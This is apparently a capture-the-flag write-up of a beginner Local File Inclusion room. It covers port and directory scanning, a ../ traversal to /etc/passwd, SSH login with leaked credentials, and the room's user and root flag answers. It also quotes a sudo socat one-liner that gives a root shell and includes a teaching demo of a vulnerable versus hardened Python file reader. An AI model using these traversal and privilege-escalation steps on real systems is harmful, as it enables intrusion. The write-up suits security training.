progrez.cloud

LFI Inclusion - Tryhackme | Web | Easy

14 March 2021

LFI Inclusion

A beginner-level LFI challenge


Task 1 # Deploy


This is a beginner-level room designed for people who want to get familiar with Local File Inclusion vulnerabilities.


Deploy the machine and start enumerating.


Task 2 # Root It


Once you have deployed the VM, try to find the LFI parameter and get the user and root flags.



Okay, let's work through the challenge. First we find out which service ports are open by port scanning the target with nmap.

┌─[cyber@cyber]─[~]
└──╼ $sudo nmap -sV -sC -Pn 10.10.0.114
[sudo] password for cyber: 
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-03-14 20:24 WIT
Nmap scan report for 10.10.0.114
Host is up (0.30s latency).
Not shown: 998 closed ports
PORT  STATE SERVICE VERSION
22/tcp open ssh    OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|  2048 e6:3a:2e:37:2b:35:fb:47:ca:90:30:d2:14:1c:6c:50 (RSA)
|  256 73:1d:17:93:80:31:4f:8a:d5:71:cb:ba:70:63:38:04 (ECDSA)
|_ 256 d3:52:31:e8:78:1b:a6:84:db:9b:23:86:f0:1f:31:2a (ED25519)
80/tcp open http   Werkzeug httpd 0.16.0 (Python 3.6.9)
|_http-title: My blog
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 73.10 seconds

The scan above shows 2 open ports:

22 = ssh

80 = http

The banner on port 80, Werkzeug httpd 0.16.0 (Python 3.6.9), is the Werkzeug development server, which almost always means a Flask application. That is worth keeping in mind: the file-reading bug we are about to find lives in Python application code, not in a web server configuration.


Next, open the machine's IP address in the browser.



After that, brute-force the directories and files under the URL with DirBuster.


┌─[✗]─[cyber@cyber]─[~]
└──╼ $dirbuster 
Starting OWASP DirBuster 1.0-RC1
Starting dir/file list based brute forcing
Dir found: / - 200
File found: /article - 500

Next, open the /article path in the browser.


It returns an Internal Server Error, so this is where the bug is: /article on its own crashes, which usually means the handler expects a query parameter it did not receive, and that parameter is exactly what we want to feed a file path into. For more background on LFI, see the Acunetix website.



Now send the LFI payload: a ../ traversal to /etc/passwd in the article parameter.


The LFI input above returns the system file /etc/passwd, and it also reveals a username and password we can use to log in over SSH. A real /etc/passwd holds no passwords (those live in /etc/shadow), so a credential showing up here is a CTF shortcut, not something to expect on a real engagement. Let's take a look at the system.
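To show what this bug looks like inside the kind of application the scan identified (Werkzeug, i.e. a Flask-style Python handler), here is an added example. It is not the room's source code and not the author's: a minimal model of an /article handler that takes an article name from the request, in its vulnerable form next to a hardened one. The parameter name `name`, the `articles` directory and the files it reads are assumptions constructed for the demo; the room's real parameter is not shown on this page. The same model explains why the LFI can later read /root/root.txt: the unsafe reader opens whatever the server process is allowed to open.

```python
import os
import tempfile


def read_article_unsafe(base_dir: str, name: str) -> str:
    """Vulnerable reader: the user-controlled name is joined straight onto base_dir.

    '../secret.txt' walks out of base_dir, and an absolute name replaces it
    entirely (os.path.join discards everything before an absolute component),
    so the caller gets any file the web server process can read.
    """
    with open(os.path.join(base_dir, name)) as f:
        return f.read()


def read_article_safe(base_dir: str, name: str) -> str:
    """Hardened reader: resolve the final path and refuse anything outside base_dir.

    os.path.realpath collapses '..' components and follows symlinks before the
    containment check, so the check applies to the file that would actually be opened.
    """
    root = os.path.realpath(base_dir)
    target = os.path.realpath(os.path.join(root, name))
    if os.path.commonpath([root, target]) != root:
        raise PermissionError(f"path escapes {root}: {name!r}")
    if not os.path.isfile(target):
        raise FileNotFoundError(name)
    with open(target) as f:
        return f.read()


def demo() -> dict:
    """Build a throwaway tree (constructed data, not from the target) and exercise both readers.

    <tmp>/articles/hello.txt   the one legitimate article
    <tmp>/secret.txt           stands in for /etc/passwd or /root/root.txt
    """
    tmp = tempfile.mkdtemp()
    articles = os.path.join(tmp, "articles")
    os.mkdir(articles)
    with open(os.path.join(articles, "hello.txt"), "w") as f:
        f.write("hello article\n")
    secret = os.path.join(tmp, "secret.txt")
    with open(secret, "w") as f:
        f.write("constructed secret outside the articles directory\n")

    results = {
        "unsafe_normal": read_article_unsafe(articles, "hello.txt"),
        # the LFI: one '../' is enough because the secret sits right above articles/
        "unsafe_traversal": read_article_unsafe(articles, "../secret.txt"),
        "safe_normal": read_article_safe(articles, "hello.txt"),
    }

    # Payloads the hardened reader must refuse: plain traversal, an absolute path,
    # and a traversal hidden behind a real filename.
    payloads = ["../secret.txt", secret, "hello.txt/../../secret.txt"]
    blocked = []
    for payload in payloads:
        try:
            read_article_safe(articles, payload)
            blocked.append((payload, False))
        except (PermissionError, FileNotFoundError):
            blocked.append((payload, True))
    results["safe_blocked"] = blocked
    return results


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value!r}")
```

Running the block shows the unsafe reader handing back the file outside the articles directory for `../secret.txt`, while the hardened reader rejects that payload, an absolute path, and a traversal tucked behind a real filename. The reason to resolve with os.path.realpath before comparing is that `..` and symlinks are collapsed first, so a prefix check on the raw string cannot be tricked; Werkzeug ships the same containment check as `safe_join` (`werkzeug.utils.safe_join` in the 2.x line), which a Flask handler should use instead of a hand-rolled join.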


┌─[cyber@cyber]─[~]
└──╼ $sudo ssh falconfeast@10.10.0.114
falconfeast@10.10.0.114's password: 
Welcome to Ubuntu 18.04.3 LTS (GNU/Linux 4.15.0-74-generic x86_64)

 * Documentation: https://help.ubuntu.com
 * Management:    https://landscape.canonical.com
 * Support:       https://ubuntu.com/advantage

 System information as of Sun Mar 14 18:27:34 IST 2021

 System load: 0.0              Processes:          88
 Usage of /:  34.8% of 9.78GB  Users logged in:    0
 Memory usage: 72%              IP address for eth0: 10.10.0.114
 Swap usage:  0%
 * Canonical Livepatch is available for installation.
  - Reduce system reboots and improve kernel security. Activate at:
    https://ubuntu.com/livepatch

3 packages can be updated.
3 updates are security updates.
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings
Last login: Sun Mar 14 16:33:13 2021 from 10.9.169.148
falconfeast@inclusion:~$ ls
articles linpeas.sh user.txt
falconfeast@inclusion:~$ sudo -l
Matching Defaults entries for falconfeast on inclusion:
   env_reset, mail_badpass, secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin

User falconfeast may run the following commands on inclusion:
   (root) NOPASSWD: /usr/bin/socat
falconfeast@inclusion:~$ id
uid=1000(falconfeast) gid=1000(falconfeast) groups=1000(falconfeast),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),108(lxd),113(lpadmin),114(sambashare)
falconfeast@inclusion:~$ cat user.txt 
60989655118397345799
falconfeast@inclusion:~$ ls /root/root.txt
ls: cannot access '/root/root.txt': Permission denied
falconfeast@inclusion:~$ 


We have the user flag; now we look for the root flag.


Answer = 60989655118397345799


The root flag is protected by file permissions (ls /root/root.txt was denied above), so we go back to the LFI. The web application reads files with the privileges of the process it runs under, and since it returns /root/root.txt the Werkzeug server must be running as root. The sudo -l output above also shows another route: falconfeast can run /usr/bin/socat as root without a password, and socat can spawn a shell (GTFOBins lists `sudo socat stdin exec:/bin/sh`), which would give a full root shell rather than a single file read.



And there it is, got it.


Answer = 42964104845495153909


Done.


Okay, thanks for reading.